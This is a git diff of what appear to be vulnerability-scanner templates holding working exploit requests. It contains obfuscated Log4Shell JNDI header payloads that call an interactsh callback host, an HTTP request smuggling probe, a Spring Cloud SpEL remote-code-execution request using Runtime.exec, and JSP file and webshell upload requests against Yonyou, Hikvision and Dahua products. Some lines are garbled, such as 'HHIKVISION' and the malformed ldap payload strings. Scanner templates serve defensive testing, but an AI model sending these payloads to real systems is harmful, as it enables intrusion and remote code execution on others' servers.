- - 'Referer: ${jndi:rmi://{{interactsh-url}}}'
- - 'Referer: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Referer: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Referer: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'CF-Connecting_IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'CF-Connecting_IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'CF-Connecting_IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'CF-Connecting_IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'CF-Connecting_IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'CF-Connecting_IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'CF-Connecting_IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'True-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'True-Client-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'True-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'True-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'True-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'True-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Forwarded-For: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Forwarded-For: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'Originating-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'Originating-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'Originating-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'Originating-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Originating-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Originating-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Originating-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Real-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Real-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Real-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Real-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Real-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Real-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Real-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Client-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'Forwarded: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'Forwarded: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'Forwarded: ${jndi:rmi://{{interactsh-url}}}'
- - 'Forwarded: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Forwarded: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Forwarded: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Forwarded: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'Client-IP: ${jndi:rmi://{{interactsh-url}}}'
- - 'Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'Contact: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'Contact: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'Contact: ${jndi:rmi://{{interactsh-url}}}'
- - 'Contact: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Contact: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Contact: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'Contact: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Wap-Profile: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Wap-Profile: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Wap-Profile: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Wap-Profile: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Wap-Profile: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Wap-Profile: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
- - 'X-Api-Version: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
- - 'X-Api-Version: ${jndi:rmi://{{interactsh-url}}}'
- - 'X-Api-Version: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Api-Version: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Api-Version: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
- - 'X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
- - 'X-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Remote-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Remote-Addrldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Forwarded-Forldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Originating-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'User-Agentldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'Refererldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'CF-Connecting_IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'True-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Forwarded-Forldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'Originating-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Real-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'Forwardedldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'Contactldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Wap-Profileldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Api-Versionldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'Hostldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
- - 'X-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Remote-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Remote-Addr: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Forwarded-For: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Originating-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'User-Agent: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'Referer: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'CF-Connecting_IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'True-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Forwarded-For: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'Originating-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Real-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'Forwarded: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
- - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
attack: clusterbomb
matchers-condition: or
diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml
index 278b84146d..ddb83e064d 100644
--- a/poc/http/cl-te-http-smuggling.yaml
+++ b/poc/http/cl-te-http-smuggling.yaml
@@ -1,35 +1,37 @@
-id: CL-TE-http-smuggling
-info:
- name: HTTP request smuggling, basic CL.TE vulnerability
- author: pdteam, akincibor
- severity: Low
-requests:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 6
- Transfer-Encoding: chunked
-
- 0
-
- G
- - |+
- POST / HTTP/1.1
- Host: {{Hostname}}
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 6
- Transfer-Encoding: chunked
-
- 0
-
- G
-
- unsafe: true
- matchers:
- - type: dsl
- dsl:
- - 'contains(body, "Unrecognized method GPOST")'
+id: CL-TE-http-smuggling
+
+info:
+ name: HTTP request smuggling, basic CL.TE vulnerability
+ author: pdteam, akincibor
+ severity: Low
+
+http:
+ - raw:
+ - |+
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Connection: keep-alive
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 6
+ Transfer-Encoding: chunked
+
+ 0
+
+ G
+ - |+
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Connection: keep-alive
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 6
+ Transfer-Encoding: chunked
+
+ 0
+
+ G
+
+ unsafe: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body, "Unrecognized method GPOST")'
\ No newline at end of file
diff --git a/poc/java/springForShell-CVE-2022-22963.yaml b/poc/java/springForShell-CVE-2022-22963.yaml
index d04177443d..f28360d6a7 100644
--- a/poc/java/springForShell-CVE-2022-22963.yaml
+++ b/poc/java/springForShell-CVE-2022-22963.yaml
@@ -1,46 +1,44 @@
id: CVE-2022-22963
info:
- name: Spring Cloud - Remote Code Execution
- author: Mr-xn,Adam Crosser
+ name: CVE-2022-22963 - Spring Cloud RCE
+ author: rdnt
severity: critical
- description: |
- Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
- reference:
- - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
- - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
- - https://tanzu.vmware.com/security/cve-2022-22963
- - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
- - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection
- - https://nvd.nist.gov/vuln/detail/CVE-2022-22963
+ description: RCE on Spring cloud function SPEL
+ tags: cve,rce,spring,cve2022,injection
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-22963
- cwe-id: CWE-94
- tags: cve,cve2022,springcloud,rce
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-22963
+ cwe-id: CWE-770
requests:
- - raw:
- - |
- POST /functionRouter HTTP/1.1
- Host: {{Hostname}}
- spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
- Content-Type: application/x-www-form-urlencoded
-
- {{rand_base(8)}}
+ - method: POST
+ path:
+ - "{{RootURL}}/functionRouter"
+ - "{{RootURL}}/api/functionRouter"
+ - "{{RootURL}}/api/v1/functionRouter"
+ - "{{RootURL}}/../../../../../../functionRouter"
+ - "{{RootURL}}/../../../../../../;functionRouter"
+ - "{{RootURL}}/spring/functionRouter"
+ - "{{RootURL}}/admin/functionRouter"
+ - "{{RootURL}}/../../../../../../../../functionRouter"
+ - "{{RootURL}}../../../../../../../../api/functionRouter"
+ - "{{RootURL}}../../../../../../../../api/v1/functionRouter"
+ - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter"
+ - "{{RootURL}}%2fspring%2ffunctionRouter"
+ - "{{RootURL}}%2fadmin%2functionRouter"
+ headers:
+ spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("")
+ Content-Type: application/x-www-form-urlencoded
+ body: exp
matchers-condition: and
matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"
- - "dns"
- condition: or
-
- - type: status
- status:
- - 500
-
-# Enhanced by mp on 2022/05/19
+ - type: word
+ part: body
+ words:
+ - 'functionRouter'
+ - type: status
+ status:
+ - 500
\ No newline at end of file
diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml
index cef49f23fa..653783158e 100644
--- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml
+++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml
@@ -1,36 +1,43 @@
id: yonyou-nc-cloud-jsinvoke-rce
info:
- name: yonyou-nc-cloud-jsinvoke-rce
- author: pphua
+ name: Yonyou NC Cloud - Remote Code Execution
+ author: Co5mos
severity: critical
- tags: yonyou,nc-cloud,rce
- reference:
- - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA
+ description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server.
+ reference:
+ - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q
metadata:
max-request: 2
verified: true
fofa-query: app="用友-NC-Cloud"
+ tags: yonyou,rce
+
+variables:
+ str1: "{{rand_base(5)}}.txt"
http:
- raw:
- - |
+ - |
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip
- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]}
-
+ {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]}
+
- |
- GET /{{randstr}}.txt HTTP/1.1
- Content-Length: 138
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ GET /{{str1}} HTTP/1.1
+ Host: {{Hostname}}
+ matchers-condition: and
matchers:
- type: word
+ part: body
words:
- - "StringObject"
- part: body
\ No newline at end of file
+ - '5d8be7535d6383e99315739724e10fa7'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml
index e86e8491d1..538f6fd6d5 100644
--- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml
+++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml
@@ -1,19 +1,20 @@
id: HiKVISION
info:
- name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability
+ name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets
+ HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability
metadata:
fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台"
hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+
http:
- raw:
- |
- POST /svm/api/external/report HTTP/1.1
+ POST /center/api/files;.html HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
@@ -24,17 +25,11 @@ http:
<%out.print("test");%>
------WebKitFormBoundary9PggsiM755PLa54a--
- - |
- GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
-
+
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- - 'contains(body_1, "data")'
- - 'status_code_2 == 200'
- - 'contains(body_2, "test")'
+ - 'contains(body_1, "test.jsp")'
condition: and
diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml
index 7f081b05e0..7e328a8b1b 100644
--- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml
+++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml
@@ -1,48 +1,50 @@
id: HIKVISION
info:
- name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file
- author: Zero Trust Security Attack and Defense Laboratory
+ name: HHIKVISION iVMS-8700 upload Webshell file
+ author: zerZero Trust Security Attack and Defense Laboratory
severity: high
description: |
- HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files
+ HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file
metadata:
fofa-query: icon_hash="-911494769"
hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
variables:
- str1: '{{rand_base(6)}}'
- str2: '{{rand_base(6)}}'
- str3: '<%out.print("{{str2}}");%>'
+ str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding'
http:
- raw:
- |
- POST /eps/resourceOperations/upload.action HTTP/1.1
+ POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1
Host: {{Hostname}}
- User-Agent: MicroMessenger
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
-
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
- Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
+ User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 184
+ Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15
+
+ --c4155aff43901a8b2a19a4641a5efa15
+ Content-Disposition: form-data; name="fileUploader"; filename="test.jsp"
Content-Type: image/jpeg
- {{str3}}
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
+ {{randstr}}
+ --c4155aff43901a8b2a19a4641a5efa15--
- |
- GET /eps/upload/{{res_id}}.jsp HTTP/1.1
+ GET /eps/upload/{{name}}.jsp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
- name: res_id
+ name: name
json:
- ".data.resourceUuid"
internal: true
matchers:
- - type: dsl
- dsl:
- - body_2 == str2
+ - type: word
+ words:
+ - '{{randstr}}'
diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml
@@ -1,68 +1,50 @@
id: CVE-2023-3836
info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
+ name: 大华-WPMS-upload-addimgico
+ author: hufei
+ severity: high
description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
+ 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.03083
- epss-percentile: 0.8997
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
+ https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E
metadata:
+ max-request: 1
+ fofa-query: app="大华-智慧园区综合管理平台"
+ hunter-query: app.name="Dahua 大华 智慧园区管理平台"
verified: true
- max-request: 2
- vendor: dahuasecurity
